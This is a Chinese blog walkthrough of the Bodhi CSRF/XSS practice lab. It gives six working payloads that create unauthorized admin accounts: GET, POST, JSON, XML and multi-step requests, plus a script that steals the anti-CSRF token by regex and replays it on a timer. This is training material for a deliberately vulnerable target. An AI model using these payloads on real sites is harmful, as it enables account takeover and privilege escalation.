一个CSRF靶场练习

最新推荐文章于 2024-04-12 01:16:41 发布
最新推荐文章于 2024-04-12 01:16:41 发布
阅读量1.9k 收藏 7
点赞数 1
分类专栏: 渗透 文章标签: 渗透 CSRF XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NEARU/article/details/103347290
版权

xss+csrf的漏洞测试小靶场
难度递升的6个题目,第6个的技巧还是有的:正则取数据,延时请求。
靶场下载地址:http://github.com/amolnaik4/bodhi

靶场逻辑:
一个留言板功能(另一个上传html文件作为漏洞点)作为漏洞点+后台一个进程(admin_bot.py)模拟管理员访问留言板的内容。

文章目录

代码运行

由于代码原来是用docker方式的启动,因此需要对代码做些修改

  1. firefox?? or chrome and its driver in admin_bot.py
  2. uploads another_server的目录代码 调整 在 in admin_bot.py and server_8000.py

poc

直接给出的方式。

1.get csrf

能达到get请求就可以

<img src="/add_admin?username=admin111&password=admin111&isAdmin=yes&submit=Add User" />

2.post csrf

post请求可以有两种方式

  1. 虚拟表单提交
  2. 参考异步请求的方式
1. 虚拟表单

2. 异步请求
  1. 构造XMLHttpRequest对象
  2. 设置请求头
  3. 然后使用其发送异步请求

xmlhttp.setRequestHeader(“Content-Type”,“application/x-www-form-urlencoded;”);

<script language="javascript">
var url = "/add_admin";var xmlhttp;
if(window.XMLHttpRequest){xmlhttp=new XMLHttpRequest();}else{xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");}
xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState===4&&xmlhttp.status===200){var b=3;}};
xmlhttp.open("POST",url,true);
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");
var data="username=admin222&password=admin222&isAdmin=yes&submit=Add User";
xmlhttp.send(data);
</script>

3.JSON based CSRF

  1. 构造XMLHttpRequest对象
  2. 设置请求头
  3. 然后使用其发送异步请求

xmlhttp.setRequestHeader(“Content-type”,“application/json”)

<script language="javascript">var xmlhttp;if (window.XMLHttpRequest){xmlhttp=new XMLHttpRequest();}else{xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");}xmlhttp.onreadystatechange=function(){if (xmlhttp.readyState===4 && xmlhttp.status===200){var b=3;}};xmlhttp.open("POST","/add_admin",true);xmlhttp.setRequestHeader("Content-type","application/json");var data = {"username":"admin333","password":"admin333","isAdmin":"yes","submit":"Add User"};var data_json = JSON.stringify(data);xmlhttp.send(data_json);</script>

4.XML based CSRF

  1. 构造XMLHttpRequest对象
  2. 设置请求头
  3. 然后使用其发送异步请求

xmlhttp.setRequestHeader(“Content-Type”,“application/xml;”)

<script language="javascript">var url="/add_admin";var xmlhttp;if(window.XMLHttpRequest){xmlhttp=new XMLHttpRequest();}else{xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");}xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState===4&&xmlhttp.status===200){var b=3;}};xmlhttp.open("POST",url,true);xmlhttp.setRequestHeader("Content-Type","application/xml;");var data='<Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/"><Body><AddAdminUser xmlns="tns"><username>admin444</username><password>admin444</password><isAdmin>yes</isAdmin></AddAdminUser></Body></Envelope>';xmlhttp.send(data);</script>

5.Multi-Step CSRF

多步骤:(在这里CSRF其实只用到了最后一步,这就和post-csrf一样了)

  1. 构造XMLHttpRequest对象
  2. 设置请求头
  3. 然后使用其发送异步请求

xmlhttp.setRequestHeader(“Content-Type”,“application/x-www-form-urlencoded;”)

    <script language="javascript">
    var xmlhttp;
    if (window.XMLHttpRequest){xmlhttp=new XMLHttpRequest();}
    else{xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");}
    xmlhttp.onreadystatechange=function(){
    if (xmlhttp.readyState===4 && xmlhttp.status===200){var b=3;}};
    xmlhttp.open("POST","/add_admin",true);
    xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");
    var data="isAdmin=yes&step=final&username=admin555&password=admin555";
    xmlhttp.send(data);</script>

6.CSRF Token Hijacking

前面的5个漏洞其实在多数情况不需要XSS漏洞的配合也可以成功
,而这里才是XSS+CSRF关键。防御csrf一个方法就是生成随机csrf-token,这里利用CSS漏洞获取csrf-token,然后构造请求添加账户成功。

  1. 构造XMLHttpRequest对象
  2. 设置请求头
  3. 1使用其发送get同步请求获取csrf-token
  4. 2使用其发送post异步请求/add_admin 添加用户
<input id="csrf_token" name="csrf_token" type="hidden" value="IjkxZDUwNzVlNDg4ODE3MGVkOTEzZTQ2OTU3YTQ4ZjgzMDdmNmUzZGIi.DmkYfA.5H9LrJrQ0jt7L2OJhww48VAmtNg">
<script language="javascript">var url = "/add_admin";
var xmlhttp;if(window.XMLHttpRequest){xmlhttp=new XMLHttpRequest();}else{xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");}xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState===4&&xmlhttp.status===200){var b=3;}};
var csrf_token;
xmlhttp.open("GET",url,false);xmlhttp.setRequestHeader("Content-Type","text/html;");
xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState===4&&xmlhttp.status===200)
{var ss = /<input id="csrf_token" name="csrf_token" type="hidden" value="(.*?)">/g;
var css = ss.exec(xmlhttp.responseText);
csrf_token=css[1]}};
setInterval(function(){
xmlhttp.open("POST",url,false);xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");
var data="csrf_token="+csrf_token+"&username=admin666&password=admin666&isAdmin=yes&submit=Add User";
xmlhttp.send(data);},3000)

//setTimeout("function",time) 
</script>
此人亦非
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSRF漏洞-01】跨站请求伪造漏洞靶场实战
cc
02-19 4034
跨站请求伪造(Cross-site request forgery,CSRF)是一种攻击,它强制终端用户在当前对其进行身份验证后的web应用程序上执行非本意的操作。CSRF攻击的主要目的在伪造更改状态(修改密码、转账等)的请求,而不是盗取数据,因为攻击者无法查看对伪造请求的响应。借助社工的一些帮助(例如通过电子邮件或聊天发送链接),攻击者可以诱骗用户执行攻击者选择的操作。
dvwa靶场训练.rar
03-17
总结起来,"dvwa靶场训练.rar"是一个全面的Web安全学习资源,涵盖了Web开发和安全中的关键知识点。无论是对于初学者还是有经验的安全专家,都可以从中受益,提升自己的安全意识和技能。在虚拟环境中搭建和演练DVWA,...
CSRF靶场练习
Flynn的博客
03-22 1891
Bodhi - Client-side Vulnerability Playground CSRF
pikachu靶场通关之CSRF
最新发布
Python毕设源码程序王哥
04-12 1345
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。
pikachu----csrf练习
ptxybird的博客
06-16 237
pikachu--CSRF跨站请求伪造练习
CSRF实例
qq_43592364的博客
04-19 375
DVWA 首先打开DVWA的环境,此次实例是修改自己的密码,然后将别人的密码也改为自己的密码 正常登陆如下图,点击CSRF进入修改密码的部分,修改自己的密码并抓包 本次是将默认密码password改为123,抓包 我们用这个包来生成一个CSRF的表单让别人去点击 (前提是别人登录状态,浏览器有cookie生成) 生成一个CSRF的表单 我们复制这一段html的代码,在桌面新建一个html...
(三)CSRF实例
weixin_43047908的博客
04-12 523
CSRF vulnerability with no defenses 电子邮件更改功能容易受到CSRF的攻击。 通过Burp Suite代理访问流量,登录到帐户,更新电子邮件,然后在代理历史记录中查找结果请求。 构造Poc: <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')&lt
黑客靶场之ZVuldrill 附带安装教程
12-14
黑客靶场之ZVuldrill 附带安装教程 基于本地的渗透测试环境 提高自己对网络攻防的基本认识和增加自己的动手能力。基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞...
ZVuldrill 黑客靶场 附带安装教程
01-26
通过ZVuldrill靶场,学习者可以在一个安全的环境中实践这些攻击和防御技术,从而提高自己的安全技能。配合提供的"注意事项.txt"和"ZVulDrill-master"资源,用户可以逐步完成挑战,深入理解每一个漏洞的原理和解决...
OWASP Mutillidae 靶机实验指导书
06-08
该指导书对每个页面存在漏洞进行了详细分类,对OWASP Top 10 应用安全风险-2017中的漏洞举例说明,结合靶机使用还不错。
网络安全靶场(dvwa).7z
01-29
网络安全靶场(Damn Vulnerable Web Application,简称DVWA)是一个开源的Web应用程序,专为教育和测试网络安全技能而设计。它模拟了一系列常见的Web应用漏洞,使得学习者可以通过实际操作来理解和防范这些威胁。...
跨站请求伪造(CSRF)漏洞简介及靶场演示
seek_2022的博客
05-10 2775
文章目录一、CSRF漏洞简介(一)什么是CSRF?(二)CSRF的原理(三)CSRF的危害二、CSRF漏洞如何挖掘?三、靶场实战(一)线上搭建环境测试(二)靶场实战四、小结 一、CSRF漏洞简介 (一)什么是CSRFCSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者"Session Riding",通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信
CSRF漏洞靶场笔记
矜庄寂寥的博客
11-30 919
目录简介CSRF攻击步骤CSRF靶场记录CSRF(get)CSRF(post)CSRF(token验证) 简介 CSRF(Cross-site request forgery)全称为跨转请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗器其点击恶意链接或访问包含攻击代码的网页,在受害人不知情的情况下以受害人身份享服务器发送请求(如转账、改密等)。 由于已经获取了受害者的身份认证信息,在服务器看来,所有的请求均为合法正常的 CSRF攻击步骤 下面是以修改密码为例的简略流程图
CSRF实战靶场 --致谢大哥
weixin_30791095的博客
06-17 310
0X01无防护GET类型CSRF(伪造添加成员请求) 环境 靶机管理登陆 192.168.1.132 本机 192.168.1.5 首先我们登陆 test账号 然后点击 添加用户 构造出我们的url 然后发送给已经登陆的管理员 管理 点开连接 可以看见我们添加成功 0X02无防护POST类型csrf-伪造出添加成员的请求 你想让受害者执行的页面构造poc 大哥说用bu...
Pikachu漏洞练习平台实验——CSRF(三)
dishan4749253的博客
09-25 4891
概述   - 攻击场景例子   - CSRF攻击需要条件   - CSRFXSS的区别   - 如何确认一个目标站点是否有CSRF漏洞 CSRF(get) CSRF(post) CSRF(token) 防护措施 概述 CSRF 是Cross Site Request Forgery的 简称,中文...
Pikachu 漏洞练习平台 --CSRF漏洞
08-17 484
1、CSRF(get) 先点击右上角的提示,看到有好几个用户呢,用vince进行登录 登录后修改个人信息 在burpsuite找到这个请求,右键send to repeater 修改页面内容点击go 刷新靶场,看到页面内容被篡改啦 如果被攻击者此时登录状态或cookie/session没有过期,则她的信息被篡改,存在csrf漏洞 2、CSRF(post) 同理,登录后修改请求,页面信息被篡改 3、CSRF token 试了半天没法篡改了,原来这个例子是告诉我们 ...
CSRF漏洞实战靶场笔记
weixin_30367543的博客
06-13 952
记录下自己写的CSRF漏洞靶场的writeup,包括了大部分的CSRF实战场景,做个笔记。 0x01无防护GET类型csrf(伪造添加成员请求) 这一关没有任何csrf访问措施 首先我们登录test用户 发现有个添加成员功能 用test账号添加发现只有admin才可以添加 现在用另一个浏览器 ,这里用的搜狗浏览器来登录admin账号 ...
CSRF漏洞以及靶场(史上最详细)
qq_34598847的博客
10-17 969
产生原因:服务器端没有对用户提交的数据进行严格的把控,导致攻击者可以利用用户的Cookie信息伪造用户请求发送至服务器利用方式:攻击者诱导受害者进入第三方网站,在第三方网站中,向被攻击网站发送跨站请求。利用受害者在被攻击网站已经获取的注册凭证,绕过后台的用户验证,达到冒充用户对被攻击的网站执行某项操作的目的原理:攻击者盗用了你的身份,以你的名义发送恶意请求危害:以受害者名义发送邮件,发消息,盗取受害者的账号,甚至购买商品,虚拟货币转账,修改受害者的网络配置(比如修改路由器DNS、重置路由器密码)等等。
DVWA练习CSRF
dz919908651的博客
08-22 2509
DVWA练习CSRF 本博客将记录在web安全问题中一种常见的漏洞——“CSRF”漏洞的实践演练。首先阐述CSRF漏洞的概念,原理,最后展示基于DVWA的各种等级的CSRFCSRF概念 CSRF(cross-site request forgery):跨站请求伪造漏洞。 概念:利用用户已登录的身份,在用户毫不知情的情况下,以用户的名义完成非法操作。 DVWA跨站请求...
csrf dvwa靶场
09-13
CSRF (Cross-Site Request Forgery) 是一种常见的网络安全漏洞,它利用了应用程序对用户身份验证的信任,通过伪造请求来执行未经授权的操作。DVWA (Damn Vulnerable Web Application) 是一个专门设计用于练习和测试网络安全技术的虚拟靶场。 在 DVWA 靶场中,你可以练习和测试 CSRF 攻击。它提供了一些漏洞和弱点,供你进行实验和学习,包括 CSRF 攻击。你可以使用 DVWA 来了解和理解如何利用此类漏洞,并学习如何防止和保护应用程序免受 CSRF 攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值